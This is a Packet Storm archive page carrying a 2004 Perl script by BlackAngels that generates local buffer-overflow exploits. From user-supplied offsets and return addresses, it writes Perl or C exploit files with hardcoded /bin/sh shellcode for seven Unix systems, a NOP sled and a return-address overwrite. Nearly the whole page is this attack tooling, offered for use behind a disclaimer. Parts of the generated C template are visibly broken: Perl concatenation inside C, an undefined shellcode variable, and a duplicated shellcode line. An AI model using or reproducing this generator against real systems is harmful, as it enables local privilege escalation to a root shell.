Exploit the possiblities

lboeg.pl.txt

lboeg.pl.txt
Posted May 1, 2004
Authored by BlackAngels | Site blackAngels.it

Local buffer overflow exploit generator for Linux, BSD, BSDi, HP-UX, UnixWare, IRIX and SCO.

tags | overflow, local
systems | linux, irix, bsd, hpux, unixware
MD5 | cb5cbdcd5c17d8e59d12c37a65fc4867

lboeg.pl.txt

Change Mirror Download
#!/usr/bin/perl

##
# Local buffer overflow exploits generator
#
# Legal notes :
# The BlackAngels staff refuse all responsabilities
# for an incorrect or illegal use of this software
# or for eventual damages to others systems.
#
# http://www.blackangels.it
##



print "\n\n##\n";
print "# Local buffer overflow exploits generator\n";
print "# for Linux, BSD, iBSD, HP-UX, UnixWare, IRIX and SCO\n";
print "#\n";
print "# Legal notes :\n";
print "# The BlackAngels staff refuse all responsabilities for an incorrect\n";
print "# or illegal use of this software or for eventual damages to others\n";
print "# systems.\n";
print "#\n";
print "# This software could generate buffer overflow's exploits for\n";
print "# Linux, BSD, HP-UX, UnixWare, IRIX and SCO systems, in two\n";
print "# different languages ( c and perl ).\n";
print "#\n";
print "# http://www.blackAngels.it\n";
print "##\n\n\n";

print "Language [Perl=1, C=2] : ";
$language=<STDIN>;
chomp $language;

if ( $language eq "1" ) {

print "\nProgram location [Default = /bin/sh] : ";
$vulnlocate=<STDIN>;
print "Buffer size, leave blank for default [Default = 1024] : ";
$buffersize=<STDIN>;
print "Offset, leave blank for default [Default = 0] : ";
$offset=<STDIN>;
print "Return address : ";
$retaddrs=<STDIN>;
print "Exploit's parameters, leave blank for none [Ex. -x] : ";
$parameters=<STDIN>;
print "Operative system\n[Linux=1, BSD=2, iBSD=3, HP-UX=4, UnixWare=5, IRIX=6, SCO=7] : ";
$operativesys=<STDIN>;
print "Exploit's name [Default = localoverflow] : ";
$expname=<STDIN>;

chomp $vulnlocate;
chomp $buffersize;
chomp $offset;
chomp $retaddrs;
chomp $parameters;
chomp $operativesys;
chomp $expname;

if ( $expname eq "" ) {
$expname="localoverflow"
}
if ( $vulnlocate eq "" ) {
$vulnlocate="/bin/sh";
}
if ( $buffersize eq "" ) {
$buffersize="1024";
}
if ( $offset eq "" ) {
$offset="0";
}

open(exploitcode, ">>".$expname.".pl");

print exploitcode "
\#!/usr/bin/perl

\# Exploit code generated with :
\# \"Local buffer overflow exploits generator 1.1\"
\#
\# Legal notes :
\# The BlackAngels staff refuse all responsabilities for an incorrect
\# or illegal use of this software or for eventual damages to others systems.
\#
\# [ http://www.BlackAngels.it ]

\$shellcode = \n";

if ( $operativesys eq "1" ) {
print exploitcode "\"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\" .\n";
print exploitcode "\"\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\" .\n";
print exploitcode "\"\\x80\\xe8\\xdc\\xff\\xff\\xff/bin/sh\";\n";
}
if ( $operativesys eq "2" ) {
print exploitcode "\"\\xeb\\x37\\x5e\\x31\\xc0\\x88\\x46\\xfa\\x89\\x46\\xf5\\x89\\x36\\x89\\x76\" .\n";
print exploitcode "\"\\x89\\x46\\x0c\\x88\\x46\\x17\\x88\\x46\\x1a\\x88\\x46\\x1d\\x50\\x56\\xff\" .\n";
print exploitcode "\"\\x89\\x46\\x0c\\x88\\x46\\x17\\x88\\x46\\x1a\\x88\\x46\\x1d\\x50\\x56\\xff\" .\n";
print exploitcode "\"\\x36\\xb0\\x3b\\x50\\x90\\x9a\\x01\\x01\\x01\\x01\\x07\\x07\\xe8\\xc4\\xff\" .\n";
print exploitcode "\"\\xff\\xff\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\" .\n";
print exploitcode "\"\\x02\\x02\\x02/bin/sh.-c.sh\";\n";
}
if ( $operativesys eq "3" ) {
print exploitcode "\"\\xeb\\x1f\\x5e\\x31\\xc0\\x89\\x46\\xf5\\x88\\x46\\xfa\\x89\\x46\\x0c\\x89\\x76\" .\n";
print exploitcode "\"\\x08\\x50\\x8d\\x5e\\x08\\x53\\x56\\x56\\xb0\\x3b\\x9a\\xff\\xff\\xff\\xff\\x07\" .\n";
print exploitcode "\"\\xff\\xe8\\xdc\\xff\\xff\\xff/bin/sh\\x00\";\n";
}
if ( $operativesys eq "4" ) {
print exploitcode "\"\\xe8\\x3f\\x1f\\xfd\\x08\\x21\\x02\\x80\\x34\\x02\\x01\\x02\\x08\\x41\\x04\\x02\\x60\\x40\" .\n";
print exploitcode "\"\\x01\\x62\\xb4\\x5a\\x01\\x54\\x0b\\x39\\x02\\x99\\x0b\\x18\\x02\\x98\\x34\\x16\\x04\\xbe\" .\n";
print exploitcode "\"\\x20\\x20\\x08\\x01\\xe4\\x20\\xe0\\x08\\x96\\xd6\\x05\\x34\\xde\\xad\\xca\\xfe/bin/sh\\xff\";\n";
}
if ( $operativesys eq "5" ) {
print exploitcode "\"\\xeb\\x48\\x9a\\xff\\xff\\xff\\xff\\x07\\xff\\xc3\\x5e\\x31\\xc0\\x89\\x46\\xb4\" .\n";
print exploitcode "\"\\x88\\x46\\xb9\\x88\\x46\\x07\\x89\\x46\\x0c\\x31\\xc0\\x50\\xb0\\x8d\\xe8\\xdf\" .\n";
print exploitcode "\"\\xff\\xff\\xff\\x83\\xc4\\x04\\x31\\xc0\\x50\\xb0\\x17\\xe8\\xd2\\xff\\xff\\xff\" .\n";
print exploitcode "\"\\x83\\xc4\\x04\\x31\\xc0\\x50\\x8d\\x5e\\x08\\x53\\x8d\\x1e\\x89\\x5e\\x08\\x53\" .\n";
print exploitcode "\"\\xb0\\x3b\\xe8\\xbb\\xff\\xff\\xff\\x83\\xc4\\x0c\\xe8\\xbb\\xff\\xff\\xff\\x2f\" .\n";
print exploitcode "\"\\x62\\x69\\x6e\\x2f\\x73\\x68\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\";\n";
}
if ( $operativesys eq "6" ) {
print exploitcode "\"\\x04\\x10\\xff\\xff\\x24\\x02\\x03\\xf3\\x23\\xff\\x02\\x14\\x23\\xe4\\xfe\" .\n";
print exploitcode "\"\\x08\\x23\\xe5\\xfe\\x10\\xaf\\xe4\\xfe\\x10\\xaf\\xe0\\xfe\\x14\\xa3\\xe0\" .\n";
print exploitcode "\"\\xfe\\x0f\\x03\\xff\\xff\\xcc/bin/sh\";\n";
}
if ( $operativesys eq "7" ) {
print exploitcode "\"\\xeb\\x1b\\x5e\\x31\\xdb\\x89\\x5e\\x07\\x89\\x5e\\x0c\\x88\\x5e\\x11\\x31\\xc0\" .\n";
print exploitcode "\"\\xb0\\x3b\\x8d\\x7e\\x07\\x89\\xf9\\x53\\x51\\x56\\x56\\xeb\\x10\\xe8\\xe0\\xff\" .\n";
print exploitcode "\"\\xff\\xff/bin/sh\\xaa\\xaa\\xaa\\xaa\\x9a\\xaa\\xaa\\xaa\\xaa\\x07\\xaa\";\n";
}

print exploitcode "
\$bsize = $buffersize;
\$retaddr = $retaddrs;
\$nop = \"\\x90\";
\$offset = $offset;

for (\$i = 0; \$i < (\$bsize - length(\$shellcode) - 100); \$i++) {
\$buffer .= \$nop;
}

\$buffer .= \$shellcode;
print \"Using address : 0x\", sprintf('\%lx',(\$retaddr + \$offset)), \"\\n\";
\$newret = pack('l', (\$retaddr + \$offset));
for (\$i += length(\$shellcode); \$i < \$bsize; \$i += 4) {
\$buffer .= \$newret;
}\n";

if ( $parameters eq "" ) {
print exploitcode "exec(\"$vulnlocate \$buffer\");";
}
else {
print exploitcode "exec(\"$vulnlocate $parameters \$buffer\");";
}

close(exploitcode);

}
else {

print "\nProgram location [Default = /bin/sh] : ";
$vulnlocate=<STDIN>;
print "Program name : ";
$vulnprg=<STDIN>;
print "Buffer size, leave blank for default [Default = 1024] : ";
$buffersize=<STDIN>;
print "Offset, leave blank for default [Default = 0] : ";
$offset=<STDIN>;
print "Align, leave blank for default [Default = 0] : ";
$allign=<STDIN>;
print "Exploit's parameters, leave blank for none [Ex. -x] : ";
$parameters=<STDIN>;
print "Operative system\n[Linux=1, BSD=2, iBSD=3, HP-UX=4, UnixWare=5, IRIX=6, SCO=7] : ";
$operativesys=<STDIN>;
print "Exploit's name [Default = localoverflow] : ";
$expname=<STDIN>;

chomp $vulnprg;
chomp $vulnlocate;
chomp $buffersize;
chomp $offset;
chomp $allign;
chomp $parameters;
chomp $operativesys;
chomp $expname;

if ( $expname eq "" ) {
$expname="localoverflow"
}
if ( $vulnlocate eq "" ) {
$vulnlocate="/bin/sh";
}
if ( $buffersize eq "" ) {
$buffersize="1024";
}
if ( $offset eq "" ) {
$offset="0";
}
if ( $allign eq "" ) {
$allign="0";
}

open(exploitcode, ">>".$expname.".c");

print exploitcode "
/*

Exploit code generated with :
\"Local buffer overflow exploits generator 1.1\"

Legal notes :
The BlackAngels staff refuse all responsabilities for an incorrect
or illegal use of this software or for eventual damages to others systems.

[ http://www.BlackAngels.it ]

*/

\#include <stdio.h>
\#include <stdlib.h>
\#include <unistd.h>

\#define BSIZE $buffersize
\#define ALIGN $allign
\#define OFFSET $offset
\#define NOP 0x90

unsigned char shellcode[] =\n";

if ( $operativesys eq "1" ) {
print exploitcode "\"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\" .\n";
print exploitcode "\"\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\" .\n";
print exploitcode "\"\\x80\\xe8\\xdc\\xff\\xff\\xff/bin/sh\";\n";
}
if ( $operativesys eq "2" ) {
print exploitcode "\"\\xeb\\x37\\x5e\\x31\\xc0\\x88\\x46\\xfa\\x89\\x46\\xf5\\x89\\x36\\x89\\x76\" .\n";
print exploitcode "\"\\x89\\x46\\x0c\\x88\\x46\\x17\\x88\\x46\\x1a\\x88\\x46\\x1d\\x50\\x56\\xff\" .\n";
print exploitcode "\"\\x89\\x46\\x0c\\x88\\x46\\x17\\x88\\x46\\x1a\\x88\\x46\\x1d\\x50\\x56\\xff\" .\n";
print exploitcode "\"\\x36\\xb0\\x3b\\x50\\x90\\x9a\\x01\\x01\\x01\\x01\\x07\\x07\\xe8\\xc4\\xff\" .\n";
print exploitcode "\"\\xff\\xff\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\" .\n";
print exploitcode "\"\\x02\\x02\\x02/bin/sh.-c.sh\";\n";
}
if ( $operativesys eq "3" ) {
print exploitcode "\"\\xeb\\x1f\\x5e\\x31\\xc0\\x89\\x46\\xf5\\x88\\x46\\xfa\\x89\\x46\\x0c\\x89\\x76\" .\n";
print exploitcode "\"\\x08\\x50\\x8d\\x5e\\x08\\x53\\x56\\x56\\xb0\\x3b\\x9a\\xff\\xff\\xff\\xff\\x07\" .\n";
print exploitcode "\"\\xff\\xe8\\xdc\\xff\\xff\\xff/bin/sh\\x00\";\n";
}
if ( $operativesys eq "4" ) {
print exploitcode "\"\\xe8\\x3f\\x1f\\xfd\\x08\\x21\\x02\\x80\\x34\\x02\\x01\\x02\\x08\\x41\\x04\\x02\\x60\\x40\" .\n";
print exploitcode "\"\\x01\\x62\\xb4\\x5a\\x01\\x54\\x0b\\x39\\x02\\x99\\x0b\\x18\\x02\\x98\\x34\\x16\\x04\\xbe\" .\n";
print exploitcode "\"\\x20\\x20\\x08\\x01\\xe4\\x20\\xe0\\x08\\x96\\xd6\\x05\\x34\\xde\\xad\\xca\\xfe/bin/sh\\xff\";\n";
}
if ( $operativesys eq "5" ) {
print exploitcode "\"\\xeb\\x48\\x9a\\xff\\xff\\xff\\xff\\x07\\xff\\xc3\\x5e\\x31\\xc0\\x89\\x46\\xb4\" .\n";
print exploitcode "\"\\x88\\x46\\xb9\\x88\\x46\\x07\\x89\\x46\\x0c\\x31\\xc0\\x50\\xb0\\x8d\\xe8\\xdf\" .\n";
print exploitcode "\"\\xff\\xff\\xff\\x83\\xc4\\x04\\x31\\xc0\\x50\\xb0\\x17\\xe8\\xd2\\xff\\xff\\xff\" .\n";
print exploitcode "\"\\x83\\xc4\\x04\\x31\\xc0\\x50\\x8d\\x5e\\x08\\x53\\x8d\\x1e\\x89\\x5e\\x08\\x53\" .\n";
print exploitcode "\"\\xb0\\x3b\\xe8\\xbb\\xff\\xff\\xff\\x83\\xc4\\x0c\\xe8\\xbb\\xff\\xff\\xff\\x2f\" .\n";
print exploitcode "\"\\x62\\x69\\x6e\\x2f\\x73\\x68\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\";\n";
}
if ( $operativesys eq "6" ) {
print exploitcode "\"\\x04\\x10\\xff\\xff\\x24\\x02\\x03\\xf3\\x23\\xff\\x02\\x14\\x23\\xe4\\xfe\" .\n";
print exploitcode "\"\\x08\\x23\\xe5\\xfe\\x10\\xaf\\xe4\\xfe\\x10\\xaf\\xe0\\xfe\\x14\\xa3\\xe0\" .\n";
print exploitcode "\"\\xfe\\x0f\\x03\\xff\\xff\\xcc/bin/sh\";\n";
}
if ( $operativesys eq "7" ) {
print exploitcode "\"\\xeb\\x1b\\x5e\\x31\\xdb\\x89\\x5e\\x07\\x89\\x5e\\x0c\\x88\\x5e\\x11\\x31\\xc0\" .\n";
print exploitcode "\"\\xb0\\x3b\\x8d\\x7e\\x07\\x89\\xf9\\x53\\x51\\x56\\x56\\xeb\\x10\\xe8\\xe0\\xff\" .\n";
print exploitcode "\"\\xff\\xff/bin/sh\\xaa\\xaa\\xaa\\xaa\\x9a\\xaa\\xaa\\xaa\\xaa\\x07\\xaa\";\n";
}

print exploitcode "
unsigned long get_sp(void) {
__asm__(\"movl %esp, %eax\");
}

int main(\int argc, char **argv) {

char *buffer;
int i;
int bsize = BSIZE;
int align = ALIGN;
int offset = OFFSET;
unsigned long addr;

\if(argc > 1) bsize = atoi(argv[1]);

buffer = (char *)malloc(bsize);
bzero(buffer, bsize);
memset(buffer, NOP, bsize);
addr = get_sp() - offset;

*(unsigned long *)&buffer[bsize - 4] = addr;
*(unsigned long *)&buffer[bsize - 8] = addr;

memcpy(buffer + bsize - 8 - align - strlen(esshellcode), esshellcode, strlen(esshellcode));\n";

if ( $parameters eq "" ) {
print exploitcode "execl(\"$vulnlocate\", \"$vulnprg\", buffer, NULL);}";
}
else {
print exploitcode "execl(\"$vulnlocate\", \"$vulnprg\", \"$parameters\", buffer, NULL);}";
}

close(exploitcode);

}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    22 Files
  • 2
    Nov 2nd
    28 Files
  • 3
    Nov 3rd
    10 Files
  • 4
    Nov 4th
    1 Files
  • 5
    Nov 5th
    5 Files
  • 6
    Nov 6th
    15 Files
  • 7
    Nov 7th
    15 Files
  • 8
    Nov 8th
    13 Files
  • 9
    Nov 9th
    9 Files
  • 10
    Nov 10th
    9 Files
  • 11
    Nov 11th
    3 Files
  • 12
    Nov 12th
    2 Files
  • 13
    Nov 13th
    15 Files
  • 14
    Nov 14th
    17 Files
  • 15
    Nov 15th
    19 Files
  • 16
    Nov 16th
    15 Files
  • 17
    Nov 17th
    19 Files
  • 18
    Nov 18th
    4 Files
  • 19
    Nov 19th
    2 Files
  • 20
    Nov 20th
    9 Files
  • 21
    Nov 21st
    15 Files
  • 22
    Nov 22nd
    23 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close